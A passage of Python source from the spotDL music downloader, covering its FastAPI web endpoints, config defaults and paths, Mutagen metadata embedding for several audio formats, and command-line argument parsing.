""" if "playlist" in url: playlist = Playlist.from_url(url) return list(map(Song.from_url, playlist.urls)) if "album" in url: album = Album.from_url(url) return list(map(Song.from_url, album.urls)) if "artist" in url: artist = Artist.from_url(url) return list(map(Song.from_url, artist.urls)) return [Song.from_url(url)] @router.get("/api/version", response_model=None) def version() -> str: """ Get the current version This method is created to ensure backward compatibility of the web app, as the web app is updated with the latest regardless of the backend version ### Returns - returns the version of the app """ return __version__ @router.on_event("shutdown") async def shutdown_event(): """ Called when the server is shutting down. """ if ( not app_state.web_settings["keep_sessions"] and not app_state.web_settings["web_use_output_dir"] ): app_state.logger.info("Removing sessions directories") sessions_dir = Path(get_spotdl_path(), "web/sessions") if sessions_dir.exists(): shutil.rmtree(sessions_dir) @router.get("/api/songs/search", response_model=None) def query_search(query: str) -> List[Song]: """ Parse search term and return list of Song objects. ### Arguments - query: The query to parse. ### Returns - returns a list of Song objects. """ return get_search_results(query) @router.post("/api/download/url") async def download_url( url: str, client: Client = Depends(get_client), state: ApplicationState = Depends(get_current_state), ) -> Optional[str]: """ Download songs using Song url. ### Arguments - url: The url to download. ### Returns - returns the file path if the song was downloaded. """ if state.web_settings.get("web_use_output_dir", False): client.downloader.settings["output"] = client.downloader_settings["output"] else: client.downloader.settings["output"] = str( (get_spotdl_path() / f"web/sessions/{client.client_id}").absolute() ) client.downloader.progress_handler = ProgressHandler( simple_tui=True, update_callback=client.song_update, ) try: # Fetch song metadata song = Song.from_url(url) # Download Song _, path = await client.downloader.pool_download(song) if path is None: state.logger.error(f"Failure downloading {song.name}") raise HTTPException( status_code=500, detail=f"Error downloading: {song.name}" ) return str(path.absolute()) except Exception as exception: state.logger.error(f"Error downloading! {exception}") raise HTTPException( status_code=500, detail=f"Error downloading: {exception}" ) from exception @router.get("/api/download/file") async def download_file( file: str, client: Client = Depends(get_client), state: ApplicationState = Depends(get_current_state), ): """ Download file using path. ### Arguments - file: The file path. - client: The client's state. ### Returns - returns the file response, filename specified to return as attachment. """ expected_path = str((get_spotdl_path() / "web/sessions").absolute()) if state.web_settings.get("web_use_output_dir", False): expected_path = str( Path(client.downloader_settings["output"].split("{", 1)[0]).absolute() ) if (not file.endswith(client.downloader_settings["format"])) or ( not file.startswith(expected_path) ): raise HTTPException(status_code=400, detail="Invalid download path.") return FileResponse( file, filename=os.path.basename(file), ) @router.get("/api/settings") def get_settings( client: Client = Depends(get_client), ) -> DownloaderOptions: """ Get client settings. ### Arguments - client: The client's state. ### Returns - returns the settings. 
""" return client.downloader_settings @router.post("/api/settings/update") def update_settings( settings: DownloaderOptionalOptions, client: Client = Depends(get_client), state: ApplicationState = Depends(get_current_state), ) -> DownloaderOptions: """ Update client settings, and re-initialize downloader. ### Arguments - settings: The settings to change. - client: The client's state. - state: The application state. ### Returns - returns True if the settings were changed. """ # Create shallow copy of settings settings_cpy = client.downloader_settings.copy() # Update settings with new settings that are not None settings_cpy.update({k: v for k, v in settings.items() if v is not None}) # type: ignore state.logger.info(f"Applying settings: {settings_cpy}") new_settings = DownloaderOptions(**settings_cpy) # type: ignore # Re-initialize downloader client.downloader_settings = new_settings client.downloader = Downloader( new_settings, loop=state.loop, ) return new_settings @router.get("/api/check_update") def check_update() -> bool: """ Check for update. ### Returns - returns True if there is an update. """ try: _, ahead, _ = get_status(__version__, "master") if ahead > 0: return True except RuntimeError: latest_version = get_latest_version() latest_tuple = tuple(latest_version.replace("v", "").split(".")) current_tuple = tuple(__version__.split(".")) if latest_tuple > current_tuple: return True except RateLimitError: return False return False @router.get("/api/options_model") def get_options() -> Dict[str, Any]: """ Get options model (possible settings). ### Returns - returns the options. """ parser = create_parser() # Forbidden actions forbidden_actions = [ "help", "operation", "version", "config", "user_auth", "client_id", "client_secret", "auth_token", "cache_path", "no_cache", "cookie_file", "ffmpeg", "archive", "host", "port", "keep_alive", "enable_tls", "key_file", "cert_file", "ca_file", "allowed_origins", "web_use_output_dir", "keep_sessions", "log_level", "simple_tui", "headless", "download_ffmpeg", "generate_config", "check_for_updates", "profile", "version", ] options = {} for action in parser._actions: # pylint: disable=protected-access if action.dest in forbidden_actions: continue default = app_state.downloader_settings.get(action.dest, None) choices = list(action.choices) if action.choices else None type_name = "" if action.type is not None: if hasattr(action.type, "__objclass__"): type_name: str = action.type.__objclass__.__name__ # type: ignore else: type_name: str = action.type.__name__ # type: ignore if isinstance( action, argparse._StoreConstAction # pylint: disable=protected-access ): type_name = "bool" if choices is not None and action.nargs == "*": type_name = "list" options[action.dest] = { "type": type_name, "choices": choices, "default": default, "help": action.help, } return options def fix_mime_types(): """Fix incorrect entries in the `mimetypes` registry. On Windows, the Python standard library's `mimetypes` reads in mappings from file extension to MIME type from the Windows registry. Other applications can and do write incorrect values to this registry, which causes `mimetypes.guess_type` to return incorrect values, which causes spotDL to fail to render on the frontend. This method hard-codes the correct mappings for certain MIME types that are known to be either used by TensorBoard or problematic in general. 
""" # Known to be problematic when Visual Studio is installed: # <https://github.com/tensorflow/tensorboard/issues/3120> # https://github.com/spotDL/spotify-downloader/issues/1540 mimetypes.add_type("application/javascript", ".js") # Not known to be problematic, but used by spotDL: mimetypes.add_type("text/css", ".css") mimetypes.add_type("image/svg+xml", ".svg") mimetypes.add_type("text/html", ".html") File: spotdl/utils/config.py """ Module related to managing reading and writing to the config file. Default config - spotdl.utils.config.DEFAULT_CONFIG """ import json import logging import os import platform from argparse import Namespace from pathlib import Path from typing import Any, Dict, Tuple, Union import platformdirs from spotdl.types.options import ( DownloaderOptions, SpotDLOptions, SpotifyOptions, WebOptions, ) __all__ = [ "ConfigError", "get_spotdl_path", "get_config_file", "get_cache_path", "get_temp_path", "get_errors_path", "get_web_ui_path", "get_config", "create_settings_type", "create_settings", "SPOTIFY_OPTIONS", "DOWNLOADER_OPTIONS", "WEB_OPTIONS", "DEFAULT_CONFIG", ] logger = logging.getLogger(__name__) class ConfigError(Exception): """ Base class for all exceptions related to config. """ def get_spotdl_path() -> Path: """ Get the path to the spotdl folder. ### Returns - The path to the spotdl folder. ### Notes - If the spotdl directory does not exist, it will be created. """ # Check if os is linux if platform.system() == "Linux": # if platform is linux, and XDG DATA HOME spotdl folder exists, use it user_data_dir = Path(platformdirs.user_data_dir("spotdl", "spotDL")) if user_data_dir.exists(): return user_data_dir spotdl_path = Path(os.path.expanduser("~"), ".spotdl") if not spotdl_path.exists(): os.mkdir(spotdl_path) return spotdl_path def get_config_file() -> Path: """ Get config file path ### Returns - The path to the config file. """ return get_spotdl_path() / "config.json" def get_cache_path() -> Path: """ Get the path to the cache folder. ### Returns - The path to the spotipy cache file. """ return get_spotdl_path() / ".spotipy" def get_spotify_cache_path() -> Path: """ Get the path to the spotify cache folder. ### Returns - The path to the spotipy cache file. """ return get_spotdl_path() / ".spotify_cache" def get_temp_path() -> Path: """ Get the path to the temp folder. ### Returns - The path to the temp folder. """ temp_path = get_spotdl_path() / "temp" if not temp_path.exists(): os.mkdir(temp_path) return temp_path def get_errors_path() -> Path: """ Get the path to the errors folder. ### Returns - The path to the errors folder. ### Notes - If the errors directory does not exist, it will be created. """ errors_path = get_spotdl_path() / "errors" if not errors_path.exists(): os.mkdir(errors_path) return errors_path def get_web_ui_path() -> Path: """ Get the path to the web-ui folder. ### Returns - The path to the web-ui folder. ### Notes - If the web-ui directory does not exist, it will be created. """ web_ui_path = get_spotdl_path() / "web-ui" if not web_ui_path.exists(): os.mkdir(web_ui_path) return web_ui_path def get_config() -> Dict[str, Any]: """ Get the config. ### Returns - The dictionary with the config. ### Errors - ConfigError: If the config file does not exist. """ config_path = get_config_file() if not config_path.exists(): raise ConfigError( "Config file not found." "Please run `spotdl --generate-config` to create a config file." 
) with open(config_path, "r", encoding="utf-8") as config_file: return json.load(config_file) def create_settings_type( arguments: Namespace, config: Dict[str, Any], default: Union[SpotifyOptions, DownloaderOptions, WebOptions], ) -> Dict[str, Any]: """ Create settings dict Argument value has always the priority, then the config file value, and if neither are set, use default value ### Arguments - arguments: Namespace from argparse - default: dict ### Returns - settings: dict """ settings = {} for key, default_value in default.items(): argument_val = arguments.__dict__.get(key) config_val = config.get(key) if argument_val is not None: settings[key] = argument_val elif config_val is not None: settings[key] = config_val else: settings[key] = default_value return settings def create_settings( arguments: Namespace, ) -> Tuple[SpotifyOptions, DownloaderOptions, WebOptions]: """ Create settings dicts for Spotify, Downloader and Web based on the arguments and config file (if enabled) ### Arguments - arguments: Namespace from argparse ### Returns - spotify_options: SpotifyOptions - downloader_options: DownloaderOptions - web_options: WebOptions """ # Get the config file # It will automatically load if the `load_config` is set to True # in the config file config = {} if arguments.config or ( get_config_file().exists() and get_config().get("load_config") ): config = get_config() # Type: ignore because of the issues below # https://github.com/python/mypy/issues/8890 # https://github.com/python/mypy/issues/5382 spotify_options = SpotifyOptions( **create_settings_type(arguments, config, SPOTIFY_OPTIONS) # type: ignore ) downloader_options = DownloaderOptions( **create_settings_type(arguments, config, DOWNLOADER_OPTIONS) # type: ignore ) web_options = WebOptions(**create_settings_type(arguments, config, WEB_OPTIONS)) # type: ignore return spotify_options, downloader_options, web_options def modernize_settings(options: DownloaderOptions): """Handle deprecated values in config file. ### Arguments - options: DownloaderOptions to modernize """ warning_msg = "Deprecated '%s' value found for '%s' setting in config file. Using '%s' instead." 
# Respect backward compatibility with old boolean --restrict flag if options["restrict"] is True: logger.warning(warning_msg, True, "restrict", "strict") options["restrict"] = "strict" class GlobalConfig: """ Class to store global configuration """ parameters: Dict[str, Any] = {} @classmethod def set_parameter(cls, key, value): """ Set a parameter for the download config """ cls.parameters[key] = value @classmethod def get_parameter(cls, key): """ Get a parameter from the download config """ return cls.parameters.get(key, None) SPOTIFY_OPTIONS: SpotifyOptions = { "client_id": "5f573c9620494bae87890c0f08a60293", "client_secret": "212476d9b0f3472eaa762d90b19b0ba8", "auth_token": None, "user_auth": False, "headless": False, "cache_path": str(get_cache_path()), "no_cache": False, "max_retries": 3, "use_cache_file": False, } DOWNLOADER_OPTIONS: DownloaderOptions = { "audio_providers": ["youtube-music"], "lyrics_providers": ["genius", "azlyrics", "musixmatch"], "genius_token": "alXXDbPZtK1m2RrZ8I4k2Hn8Ahsd0Gh_o076HYvcdlBvmc0ULL1H8Z8xRlew5qaG", "playlist_numbering": False, "scan_for_songs": False, "m3u": None, "output": "{artists} - {title}.{output-ext}", "overwrite": "skip", "search_query": None, "ffmpeg": "ffmpeg", "bitrate": None, "ffmpeg_args": None, "format": "mp3", "save_file": None, "filter_results": True, "album_type": None, "threads": 4, "cookie_file": None, "restrict": None, "print_errors": False, "sponsor_block": False, "preload": False, "archive": None, "load_config": True, "log_level": "INFO", "simple_tui": False, "fetch_albums": False, "id3_separator": "/", "ytm_data": False, "add_unavailable": False, "generate_lrc": False, "force_update_metadata": False, "only_verified_results": False, "sync_without_deleting": False, "max_filename_length": None, "yt_dlp_args": None, "detect_formats": None, "save_errors": None, "ignore_albums": None, "proxy": None, "skip_explicit": False, "log_format": None, "redownload": False, "skip_album_art": False, "create_skip_file": False, "respect_skip_file": False, "sync_remove_lrc": False, } WEB_OPTIONS: WebOptions = { "web_use_output_dir": False, "port": 8800, "host": "localhost", "keep_alive": False, "enable_tls": False, "key_file": None, "cert_file": None, "ca_file": None, "allowed_origins": None, "keep_sessions": False, "force_update_gui": False, "web_gui_repo": None, "web_gui_location": None, } # Type: ignore because of the issues above DEFAULT_CONFIG: SpotDLOptions = { **SPOTIFY_OPTIONS, # type: ignore **DOWNLOADER_OPTIONS, # type: ignore **WEB_OPTIONS, # type: ignore } File: spotdl/utils/metadata.py """ Module for embedding metadata into audio files using Mutagen. 
```python embed_metadata( output_file=Path("test.mp3"), song=song_object, file_format="mp3", ) ``` """ import base64 import logging import re from pathlib import Path from typing import Any, Dict, Optional import requests from mutagen._file import File from mutagen.flac import Picture from mutagen.id3 import ID3 from mutagen.id3._frames import ( APIC, COMM, POPM, SYLT, TALB, TCOM, TCON, TCOP, TDRC, TIT2, TPE1, TRCK, TSRC, TYER, USLT, WOAS, ) from mutagen.id3._specs import Encoding from mutagen.mp4 import MP4Cover from mutagen.wave import WAVE from spotdl.types.song import Song from spotdl.utils.config import GlobalConfig from spotdl.utils.formatter import to_ms from spotdl.utils.lrc import remomve_lrc logger = logging.getLogger(__name__) __all__ = [ "MetadataError", "M4A_TAG_PRESET", "MP3_TAG_PRESET", "TAG_PRESET", "TAG_TO_SONG", "M4A_TO_SONG", "MP3_TO_SONG", "LRC_REGEX", "embed_metadata", "embed_cover", "embed_lyrics", "get_file_metadata", ] class MetadataError(Exception): """ Base class for all exceptions related to metadata and id3 embedding. """ # Apple has specific tags - see mutagen docs - # http://mutagen.readthedocs.io/en/latest/api/mp4.html M4A_TAG_PRESET = { "album": "\xa9alb", "artist": "\xa9ART", "date": "\xa9day", "title": "\xa9nam", "year": "\xa9day", "comment": "\xa9cmt", "group": "\xa9grp", "writer": "\xa9wrt", "genre": "\xa9gen", "tracknumber": "trkn", "trackcount": "trkn", "albumartist": "aART", "discnumber": "disk", "disccount": "disk", "cpil": "cpil", "albumart": "covr", "encodedby": "\xa9too", "copyright": "cprt", "tempo": "tmpo", "lyrics": "\xa9lyr", "explicit": "rtng", "woas": "----:spotdl:WOAS", "isrc": "----:spotdl:ISRC", } MP3_TAG_PRESET = { "album": "TALB", "artist": "TPE1", "date": "TDRC", "title": "TIT2", "year": "TDRC", "comment": "COMM::XXX", "group": "TIT1", "writer": "TEXT", "genre": "TCON", "tracknumber": "TRCK", "trackcount": "TRCK", "albumartist": "TPE2", "discnumber": "TPOS", "disccount": "TPOS", "cpil": "TCMP", "albumart": "APIC", "encodedby": "TENC", "copyright": "TCOP", "tempo": "TBPM", "lyrics": "USLT::XXX", "woas": "WOAS", "isrc": "TSRC", "explicit": "NULL", } TAG_PRESET = {key: key for key in M4A_TAG_PRESET} TAG_TO_SONG = { "title": "name", "artist": "artists", "album": "album_name", "albumartist": "album_artist", "genre": "genres", "discnumber": "disc_number", "year": "year", "date": "date", "tracknumber": "track_number", "encodedby": "publisher", "woas": "url", "comment": "download_url", "isrc": "isrc", "copyright": "copyright_text", "lyrics": "lyrics", "albumart": "album_art", } M4A_TO_SONG = { value: TAG_TO_SONG.get(key) for key, value in M4A_TAG_PRESET.items() if TAG_TO_SONG.get(key) } MP3_TO_SONG = { value: TAG_TO_SONG.get(key) for key, value in MP3_TAG_PRESET.items() if TAG_TO_SONG.get(key) } LRC_REGEX = re.compile(r"(\[\d{2}:\d{2}.\d{2,3}\])") def embed_metadata( output_file: Path, song: Song, id3_separator: str = "/", skip_album_art: Optional[bool] = False, ): """ Set ID3 tags for generic files (FLAC, OPUS, OGG) ### Arguments - output_file: Path to the output file. - song: Song object. - id3_separator: The separator used for the id3 tags. - skip_album_art: Boolean to skip album art embedding. 
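The presets defined above decide which native tag keys get written: the same
logical field maps to a different key per container, for example:

```python
>>> MP3_TAG_PRESET["title"]
'TIT2'
>>> M4A_TAG_PRESET["title"] == "\xa9nam"
True
>>> TAG_PRESET["title"]  # flac/ogg/opus use plain Vorbis-comment style keys
'title'
```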
""" # Get the file extension for the output file encoding = output_file.suffix[1:] if encoding == "wav": embed_wav_file(output_file, song) return # Get the tag preset for the file extension tag_preset = TAG_PRESET if encoding != "m4a" else M4A_TAG_PRESET try: audio_file = File(str(output_file.resolve()), easy=encoding == "mp3") if audio_file is None: raise MetadataError( f"Unrecognized file format for {output_file} from {song.url}" ) except Exception as exc: raise MetadataError("Unable to load file.") from exc # Embed basic metadata audio_file[tag_preset["artist"]] = song.artists audio_file[tag_preset["albumartist"]] = ( song.album_artist if song.album_artist else song.artist ) audio_file[tag_preset["title"]] = song.name audio_file[tag_preset["date"]] = song.date audio_file[tag_preset["encodedby"]] = song.publisher # Embed metadata that isn't always present album_name = song.album_name if album_name: audio_file[tag_preset["album"]] = album_name if song.genres: audio_file[tag_preset["genre"]] = song.genres[0].title() if song.copyright_text: audio_file[tag_preset["copyright"]] = song.copyright_text if song.download_url and encoding != "mp3": audio_file[tag_preset["comment"]] = song.download_url # Embed some metadata in format specific ways if encoding in ["flac", "ogg", "opus"]: audio_file["discnumber"] = str(song.disc_number) audio_file["disctotal"] = str(song.disc_count) audio_file["tracktotal"] = str(song.tracks_count) audio_file["tracknumber"] = str(song.track_number) audio_file["woas"] = song.url audio_file["isrc"] = song.isrc elif encoding == "m4a": audio_file[tag_preset["discnumber"]] = [(song.disc_number, song.disc_count)] audio_file[tag_preset["tracknumber"]] = [(song.track_number, song.tracks_count)] audio_file[tag_preset["explicit"]] = (4 if song.explicit is True else 2,) audio_file[tag_preset["woas"]] = song.url.encode("utf-8") elif encoding == "mp3": audio_file["tracknumber"] = f"{str(song.track_number)}/{str(song.tracks_count)}" audio_file["discnumber"] = f"{str(song.disc_number)}/{str(song.disc_count)}" audio_file["isrc"] = song.isrc # Mp3 specific encoding if encoding == "mp3": if id3_separator != "/": audio_file.save(v23_sep=id3_separator, v2_version=3) else: audio_file.save(v2_version=3) audio_file = ID3(str(output_file.resolve())) audio_file.add(WOAS(encoding=3, url=song.url)) if song.download_url: audio_file.add(COMM(encoding=3, text=song.download_url)) if song.popularity: audio_file.add( POPM( rating=int(song.popularity * 255 / 100), ) ) if song.year: audio_file.add(TYER(encoding=3, text=str(song.year))) if not skip_album_art: # Embed album art audio_file = embed_cover(audio_file, song, encoding) # Embed lyrics audio_file = embed_lyrics(audio_file, song, encoding) # Mp3 specific encoding if encoding == "mp3": audio_file.save(v23_sep=id3_separator, v2_version=3) else: audio_file.save() def embed_cover(audio_file, song: Song, encoding: str): """ Embed the album art in the audio file. ### Arguments - audio_file: Audio file object. - song: Song object. 
""" if not song.cover_url: return audio_file # Try to download the cover art try: cover_data = requests.get( song.cover_url, timeout=10, proxies=GlobalConfig.get_parameter("proxies"), ).content except Exception: return audio_file # Create the image object for the file type if encoding in ["flac", "ogg", "opus"]: picture = Picture() picture.type = 3 picture.desc = "Cover" picture.mime = "image/jpeg" picture.data = cover_data if encoding in ["ogg", "opus"]: image_data = picture.write() encoded_data = base64.b64encode(image_data) vcomment_value = encoded_data.decode("ascii") if "metadata_block_picture" in audio_file.keys(): audio_file.pop("metadata_block_picture") audio_file["metadata_block_picture"] = [vcomment_value] elif encoding == "flac": if audio_file.pictures: audio_file.clear_pictures() audio_file.add_picture(picture) elif encoding == "m4a": if M4A_TAG_PRESET["albumart"] in audio_file.keys(): audio_file.pop(M4A_TAG_PRESET["albumart"]) audio_file[M4A_TAG_PRESET["albumart"]] = [ MP4Cover( cover_data, imageformat=MP4Cover.FORMAT_JPEG, ) ] elif encoding == "mp3": if "APIC:Cover" in audio_file.keys(): audio_file.pop("APIC:Cover") audio_file["APIC"] = APIC( encoding=3, mime="image/jpeg", type=3, desc="Cover", data=cover_data, ) return audio_file def embed_lyrics(audio_file, song: Song, encoding: str): """ Detect lyrics type (lrc or txt) and embed them in the audio file. ### Arguments - audio_file: Audio file object. - song: Song object. - encoding: Encoding type. """ lyrics = song.lyrics if not lyrics: return audio_file tag_preset = TAG_PRESET if encoding != "m4a" else M4A_TAG_PRESET # Check if the lyrics are in lrc format # using regex on the first 5 lines lrc_lines = lyrics.splitlines()[:5] lrc_lines = [line for line in lrc_lines if line and LRC_REGEX.match(line)] if len(lrc_lines) == 0: # Lyrics are not in lrc format # Embed them normally if encoding == "mp3": audio_file.add(USLT(encoding=Encoding.UTF8, text=song.lyrics)) else: audio_file[tag_preset["lyrics"]] = song.lyrics else: # Lyrics are in lrc format # Embed them as SYLT id3 tag clean_lyrics = remomve_lrc(lyrics) if encoding == "mp3": lrc_data = [] for line in lyrics.splitlines(): time_tag = line.split("]", 1)[0] + "]" text = line.replace(time_tag, "") time_tag = time_tag.replace("[", "") time_tag = time_tag.replace("]", "") time_tag = time_tag.replace(".", ":") time_tag_vals = time_tag.split(":") if len(time_tag_vals) != 3 or any( not isinstance(tag, int) for tag in time_tag_vals ): continue minute, sec, millisecond = time_tag_vals time = to_ms(min=minute, sec=sec, ms=millisecond) lrc_data.append((text, time)) audio_file.add(USLT(encoding=3, text=clean_lyrics)) audio_file.add(SYLT(encoding=3, text=lrc_data, format=2, type=1)) else: audio_file[tag_preset["lyrics"]] = song.lyrics return audio_file def get_file_metadata(path: Path, id3_separator: str = "/") -> Optional[Dict[str, Any]]: """ Get song metadata. ### Arguments - path: Path to the song. ### Returns - Dict of song metadata. ### Raises - OSError: If the file is not found. - MetadataError: If the file is not a valid audio file. 
""" if path.exists() is False: raise OSError(f"File not found: {path}") audio_file = File(str(path.resolve())) if audio_file is None or audio_file == {}: return None song_meta: Dict[str, Any] = {} for key in TAG_PRESET: if path.suffix == ".m4a": val = audio_file.get(M4A_TAG_PRESET[key]) elif path.suffix == ".mp3": val = audio_file.get(MP3_TAG_PRESET[key]) else: val = audio_file.get(key) # Cover art is a special case and # has to be handled before checking the val # M4A is handled in the m4a section since it # has data in the val variable if key == "albumart": if path.suffix == ".mp3": cover = audio_file.get("APIC:Cover") if cover: song_meta["album_art"] = cover.data else: song_meta["album_art"] = None continue if path.suffix == ".flac": song_meta["album_art"] = audio_file.pictures[0].data continue if path.suffix in [".ogg", ".opus"]: pictures = audio_file.get("metadata_block_picture") if pictures and pictures[0]: song_meta["album_art"] = pictures[0] else: song_meta["album_art"] = None continue # If the tag is empty, skip it if val is None: # If the tag is empty but it's key is in the # song object, set it to None empty_key = TAG_TO_SONG.get(key) if empty_key: song_meta[empty_key] = None continue # MP3 specific decoding if path.suffix == ".mp3": if key == "woas": song_meta["url"] = val.url elif key == "comment": song_meta["download_url"] = val.text[0] elif key == "year": song_meta["year"] = int(str(val.text[0])[:4]) elif key == "date": song_meta["date"] = str(val.text[0]) elif key in ["tracknumber", "trackcount"]: count = val.text[0].split(id3_separator) if len(count) == 2: song_meta["track_number"] = int(count[0]) song_meta["tracks_count"] = int(count[1]) else: song_meta["track_number"] = val.text[0] elif key in ["discnumber", "disccount"]: count = val.text[0].split(id3_separator) if len(count) == 2: song_meta["disc_number"] = int(count[0]) song_meta["disc_count"] = int(count[1]) else: song_meta["disc_number"] = val.text[0] elif key == "artist": artists_val: str = ( val.text[0] if isinstance(val.text, list) else val.text ) song_meta["artists"] = artists_val.split(id3_separator) else: meta_key = TAG_TO_SONG.get(key) if meta_key and song_meta.get(meta_key) is None: song_meta[meta_key] = ( val.text[0] if isinstance(val.text, list) and len(val.text) == 1 else val.text ) # M4A specific decoding elif path.suffix == ".m4a": if key == "artist": song_meta["artists"] = val elif key == "woas": song_meta["url"] = val[0].decode("utf-8") elif key == "explicit": song_meta["explicit"] = val == [4] if val else None elif key == "year": song_meta["year"] = int(str(val[0])[:4]) elif key == "discnumber": song_meta["disc_number"] = val[0][0] song_meta["disc_count"] = val[0][1] elif key == "tracknumber": song_meta["track_number"] = val[0][0] song_meta["tracks_count"] = val[0][1] else: meta_key = TAG_TO_SONG.get(key) if meta_key: song_meta[meta_key] = ( val[0] if isinstance(val, list) and len(val) == 1 else val ) # FLAC, OGG, OPUS specific decoding else: if key == "artist": song_meta["artists"] = val elif key == "tracknumber": song_meta["track_number"] = int(val[0]) elif key == "discnumber": song_meta["disc_count"] = int(val[0]) song_meta["disc_number"] = int(val[0]) else: meta_key = TAG_TO_SONG.get(key) if meta_key: song_meta[meta_key] = ( val[0] if isinstance(val, list) and len(val) == 1 else val ) # Make sure that artists is a list if isinstance(song_meta["artists"], str): song_meta["artists"] = [song_meta["artists"]] elif song_meta["artists"] is not None: song_meta["artists"] = list(song_meta["artists"]) 
else: song_meta["artists"] = [] # Make sure that genres is a list if isinstance(song_meta["genres"], str): song_meta["genres"] = [song_meta["genres"]] # Add main artist to the song meta object if song_meta["artists"]: song_meta["artist"] = song_meta["artists"][0] else: song_meta["artist"] = None return song_meta def embed_wav_file(output_file: Path, song: Song): """ Embeds the song metadata into the wav file ### Arguments - output_file: The output file path - song: The song object - id3_separator: The separator used for the id3 tags """ audio = WAVE(output_file) if audio is None: raise ValueError("Invalid audio file") if audio.tags: audio.tags.clear() audio.add_tags() audio.tags.add(TIT2(encoding=3, text=song.name)) # type: ignore audio.tags.add(TPE1(encoding=3, text=song.artists)) # type: ignore audio.tags.add(TALB(encoding=3, text=song.album_name)) # type: ignore audio.tags.add(TCOM(encoding=3, text=song.publisher)) # type: ignore audio.tags.add(TCON(encoding=3, text=song.genres)) # type: ignore audio.tags.add(TDRC(encoding=3, text=song.date)) # type: ignore audio.tags.add( # type: ignore TRCK(encoding=3, text=f"{song.track_number}/{song.tracks_count}") # type: ignore ) audio.tags.add(TDRC(encoding=3, text=song.date)) # type: ignore audio.tags.add(WOAS(encoding=3, text=song.url)) # type: ignore audio.tags.add(TSRC(encoding=3, text=song.isrc)) # type: ignore if song.download_url: audio.tags.add(COMM(encoding=3, text=song.download_url)) # type: ignore if song.copyright_text: audio.tags.add(TCOP(encoding=3, text=song.copyright_text)) # type: ignore if song.popularity: audio.tags.add( # type: ignore COMM( encoding=3, lang="eng", text="Spotify Popularity: " + str(song.popularity), ) ) if song.cover_url: try: cover_data = requests.get(song.cover_url, timeout=10).content audio.tags.add( # type: ignore APIC( encoding=3, mime="image/jpeg", type=3, desc="Cover", data=cover_data ) ) except Exception: pass if song.lyrics: # Check if the lyrics are in lrc format # using regex on the first 5 lines lrc_lines = song.lyrics.splitlines()[:5] lrc_lines = [line for line in lrc_lines if line and LRC_REGEX.match(line)] if len(lrc_lines) == 0: audio.tags.add(USLT(encoding=Encoding.UTF8, text=song.lyrics)) # type: ignore else: lrc_data = [] clean_lyrics = remomve_lrc(song.lyrics) for line in song.lyrics.splitlines(): time_tag = line.split("]", 1)[0] + "]" text = line.replace(time_tag, "") time_tag = time_tag.replace("[", "") time_tag = time_tag.replace("]", "") time_tag = time_tag.replace(".", ":") time_tag_vals = time_tag.split(":") if len(time_tag_vals) != 3 or any( not isinstance(tag, int) for tag in time_tag_vals ): continue minute, sec, millisecond = time_tag_vals time = to_ms(min=minute, sec=sec, ms=millisecond) lrc_data.append((text, time)) audio.tags.add(USLT(encoding=3, text=clean_lyrics)) # type: ignore audio.tags.add(SYLT(encoding=3, text=lrc_data, format=2, type=1)) # type: ignore audio.save() File: spotdl/utils/downloader.py """ Module for functions related to downloading songs. 
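A hedged usage sketch; the exit message below is illustrative, not something
spotDL prints itself.

```python
from spotdl.utils.downloader import check_ytmusic_connection

if not check_ytmusic_connection():
    raise SystemExit("Could not reach YouTube Music, check your connection.")
```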
""" from spotdl.providers.audio import YouTubeMusic __all__ = ["check_ytmusic_connection"] def check_ytmusic_connection() -> bool: """ Check if we can connect to YouTube Music API ### Returns - `True` if we can connect to YouTube Music API - `False` if we can't connect to YouTube Music API """ # Check if we are getting results from YouTube Music ytm = YouTubeMusic() test_results = ytm.get_results("a") if len(test_results) == 0: return False return True File: spotdl/utils/arguments.py """ Module that handles the command line arguments. """ import argparse import sys import textwrap from argparse import ArgumentParser, Namespace, _ArgumentGroup from typing import List from spotdl import _version from spotdl.download.downloader import AUDIO_PROVIDERS, LYRICS_PROVIDERS from spotdl.utils.ffmpeg import FFMPEG_FORMATS from spotdl.utils.formatter import VARS from spotdl.utils.logging import NAME_TO_LEVEL __all__ = ["OPERATIONS", "SmartFormatter", "parse_arguments"] OPERATIONS = ["download", "save", "web", "sync", "meta", "url"] class SmartFormatter(argparse.HelpFormatter): """ Class that overrides the default help formatter. """ def _split_lines(self, text: str, width: int) -> List[str]: """ Split the text in multiple lines if a line starts with a N| """ if text.startswith("N|"): return text[2:].splitlines() text = self._whitespace_matcher.sub(" ", text).strip() return textwrap.wrap(text, width) def parse_main_options(parser: _ArgumentGroup): """ Parse main options from the command line. ### Arguments - parser: The argument parser to add the options to. """ # Add operation argument operation = parser.add_argument( "operation", choices=OPERATIONS, default="download", const="download", nargs="?", help=( "N|The operation to perform.\n" "download: Download the songs to the disk and embed metadata.\n" "save: Saves the songs metadata to a file for further use.\n" "web: Starts a web interface to simplify the download process.\n" "sync: Removes songs that are no longer present, downloads new ones\n" "meta: Update your audio files with metadata\n" "url: Get the download URL for songs\n\n" ), ) # Add query argument query = parser.add_argument( "query", nargs="+", type=str, help=( "N|Spotify/YouTube URL for a song/playlist/album/artist/etc. to download.\n\n" "For album/playlist/artist searching, include 'album:', 'playlist:', 'artist:' \n" "(ie. 
'album:the album name' you can mix these options to get more accurate results)" ".\n\n" "To download liked songs use 'saved' as the query, to download all user playlists\n" "use 'all-user-playlists, to download playlists that the user has created\n" "use 'all-saved-playlists', to download all user liked playlists\n" "use 'all-user-followed-artists', to download all user saved albums " "use 'all-user-saved-albums' \n\n" "For manual audio matching, you can use the format 'YouTubeURL|SpotifyURL'\n" "You can only use album/playlist/tracks urls when " "downloading/matching youtube urls.\n" "When using youtube url without spotify url, " "you won't be able to use `--fetch-albums` option.\n\n" ), ) try: is_web = sys.argv[1] == "web" except IndexError: is_web = False is_frozen = getattr(sys, "frozen", False) # If the program is frozen, we and user didn't pass any arguments, # or if the user is using the web interface, we don't need to parse # the query if (is_frozen and len(sys.argv) < 2) or (len(sys.argv) > 1 and is_web): # If we are running the web interface # or we are in the frozen env and not running web interface # don't remove the operation from the arg parser if not is_web or (is_frozen and not is_web): parser._remove_action(operation) # pylint: disable=protected-access parser._remove_action(query) # pylint: disable=protected-access # Audio provider argument parser.add_argument( "--audio", dest="audio_providers", nargs="*", choices=AUDIO_PROVIDERS, help="The audio provider to use. You can provide more than one for fallback.", ) # Lyrics provider argument parser.add_argument( "--lyrics", dest="lyrics_providers", nargs="*", choices=LYRICS_PROVIDERS.keys(), help=( "The lyrics provider to use. You can provide more than one for fallback. " "Synced lyrics might not work correctly with some music players. " "For such cases it's better to use `--generate-lrc` option." ), ) parser.add_argument( "--genius-access-token", dest="genius_token", help="Lets you choose your own Genius access token.", 